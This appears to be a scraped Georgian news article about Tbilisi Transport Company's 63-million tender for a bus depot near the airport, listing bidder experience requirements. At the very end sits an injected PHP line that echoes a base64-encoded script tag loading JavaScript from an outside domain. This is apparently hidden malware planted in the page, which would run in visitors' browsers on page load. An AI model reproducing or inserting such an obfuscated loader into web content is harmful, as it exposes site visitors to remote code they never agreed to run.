celsiusi
ავერსი საქკაბელი

თბილისის სატრანსპორტო კომპანიამ ავტობუსების პარკის მშენებლობისთვის 63-მილიონიანი ტენდერი გამოაცხადა. აქამდე ამ პროექტის განხორციელებას კომპანია გამარტივებული შესყიდვით გეგმავდა, რაზეც შესყიდვების სააგენტოსგან თანხმობაც მიიღო. თუმცა როგორც ირკვევა, კომპანია საბოლოოდ პროექტს ტენდერით განახორციელებს.

სატენდერო პირობების მიხედვით, ახალმა პარკმა 50 ერთეული 18-მეტრიანი ავტობუსი უნდა დაიტიოს. ახალი დეპო აეროპორტის მიმდებარედ, ალექსეევკას დასახლებაში უნდა აშენდეს.

სატენდერო პირობების თანახმად, პრეტედენტს, რომელსაც ამ სამუშაოს შესრულება სურს, 2017 წლის შემდგომ ავტობაზის მშენებლობის და დაპროექტების გამოცდილება უნდა გააჩნდეს.

1. M3 კატეგორიის მუნიციპალური ავტობუსების ავტობაზის ან ანალოგიური ინფრასტრუქტურული ობიექტის დაპროექტების გამოცდილება, კერძოდ, 2017 წლიდან (ელექტრონული ტენდერის (აუქციონის გარეშე) სტატუსის - „წინადადებების მიღება მთავრდება“ თარიღის ჩათვლით) უნდა ჰქონდეს შესრულებული არანაკლებ სამი საპროექტო- სახარჯთაღრიცხვო დოკუმენტაცია ზემოაღნიშნულ სფეროში, რომლის დამადასტურებელი დოკუმენტები - ხელშეკრულებ(ებ)ა და ამავე ხელშეკრულებ(ებ)ის მიღება-ჩაბარების აქტ(ებ)ი და დადასტურებული საგადასახადო ანგარიშ-ფაქტურები/საგადახდო დავალებები ან/და ინფორმაცია შესაბამისი სატენდერო განცხადების ნომრების მითითებით უნდა ატვირთოს ერთიან ელექტრონულ სისტემაში.

2. M3 კატეგორიის მუნიციპალური ავტობუსების ავტობაზის ან ანალოგიური ინფრასტრუქტურული ობიექტის მშენებლობის გამოცდილება, კერძოდ, 2017 წლიდან (ელექტრონული ტენდერის (აუქციონის გარეშე) სტატუსის - „წინადადებების მიღება მთავრდება“ თარიღის ჩათვლით) უნდა ჰქონდეს შესრულებული არანაკლებ სამი ობიექტი ზემოაღნიშნულ სფეროში, რომლის დამადასტურებელი დოკუმენტები - ხელშეკრულებ(ებ)ა და ამავე ხელშეკრულებ(ებ)ის მიღება- ჩაბარების აქტ(ებ)ი და დადასტურებული საგადასახადო ანგარიშ-ფაქტურები/საგადახდო დავალებები ან/და ინფორმაცია შესაბამისი სატენდერო განცხადების ნომრების მითითებით უნდა ატვირთოს ერთიან ელექტრონულ სისტემაში.

შენიშვნა: ანალოგიურ ინფრასტრუქტურულ ობიექტის დაპროექტების/მშენებლობის გამოცდილებაში იგულისხმება როგორც ავტობაზის, ამასთანავე სხვა სატრანსპორტო ინფრასტრუქტურული ობიექტის, სატრანსპორტო საწარმოო შენობის, მსგავსი მასშტაბის ლოჯისტიკური ცენტრის დაპროექტება/მშენებლობის გამოცდილება. 

 

წყარო: BMG

336
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");